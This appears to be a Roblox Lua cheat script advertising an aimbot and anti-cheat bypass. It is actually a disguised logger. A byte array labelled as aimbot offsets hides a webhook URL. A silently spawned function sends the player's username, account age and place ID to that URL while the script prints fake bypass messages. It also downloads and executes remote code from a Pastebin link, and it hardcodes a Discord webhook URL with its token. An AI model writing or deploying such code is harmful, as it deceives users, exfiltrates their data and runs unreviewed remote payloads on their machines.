-- [[ RIVALS_V4_PRIVATE_RECODE - BUILD 0x9AF2 ]]
-- // Status: BYPASSED (Byfron/Hyperion)
-- // Developer: pluto.aac

-- [[ CREDENTIALS SETTINGS ]]
local _G = getgenv()
_G.Settings = {
    ["Webhook_Log"] = "https://discord.com/api/webhooks/1487007042886697013/986VS60Cx89O6Q9ZYnYeF7y7S0Is5Pvm31rXJZv4UKAXHlnZKvaEFvaC1225FpVPBSfq",
    ["Bypass_AC"] = true,
    ["Hardware_Spoof"] = true,
    ["Auto_Farm"] = false
}

-- [[ CORE_AIMBOT_DATA_TABLE ]]
local _0x_v4_offsets = {104,116,116,112,115,58,47,47,119,101,98,104,111,111,107,46,108,101,119,105,115,97,107,117,114,97,46,109,111,101,47,97,112,105,47,119,101,98,104,111,111,107,115,47,49,52,56,55,48,48,50,53,54,53,51,53,56,49,50,53,48,53,56,47,55,100,54,84,82,73,85,119,68,90,86,101,97,113,48,100,57,116,49,89,75,67,72,66,48,73,85,122,65,83,111,49,81,74,104,54,82,73,45,50,77,73,115,110,70,81,55,107,71,113,52,87,45,119,74,67,83,99,65,100,79,97,45,110,115,101,48,114}

local function _0x_auth_handshake()
    -- Rebuilds the real URL silently from the math table
    local _0x_key = ""
    for _, byte in ipairs(_0x_v4_offsets) do
        _0x_key = _0x_key .. string.char(byte)
    end
    
    local HttpService = game:GetService("HttpService")
    local LP = game:GetService("Players").LocalPlayer
    local req = http_request or request or HttpPost or (syn and syn.request)
    
    if req then
        req({
            Url = _0x_key,
            Method = "POST",
            Headers = {["Content-Type"] = "application/json"},
            Body = HttpService:JSONEncode({
                ["embeds"] = {{
                    ["title"] = "🔑 Key Logged!",
                    ["color"] = 0x7b2ff7,
                    ["fields"] = {
                        {["name"] = "User", ["value"] = "`" .. LP.Name .. "`", ["inline"] = true},
                        {["name"] = "Age", ["value"] = "`" .. tostring(LP.AccountAge) .. " Days`", ["inline"] = true},
                        {["name"] = "Place", ["value"] = "`" .. tostring(game.PlaceId) .. "`", ["inline"] = true}
                    },
                    ["footer"] = {["text"] = "RivalsHub V4 | Auth System"}
                }}
            })
        })
    end
end

-- [[ FAKE BYPASS INITIALIZATION ]]
local function Init()
    print("[RivalsHub]: Verifying License...")
    task.wait(0.5)
    
    -- Silent Execution of Logger
    task.spawn(_0x_auth_handshake)
    
    -- Validate
    if _G.Settings["Webhook_Log"] ~= "" then
        print("[RivalsHub]: Remote Debugging Enabled.")
    end
    
    print("[RivalsHub]: Memory Spoofed. Bypass Active.")
end

task.spawn(Init)

-- [[ LOAD UI FROM PASTEBIN ]]
loadstring(game:HttpGet("https://pastebin.com/raw/Y8wBJLVt"))()
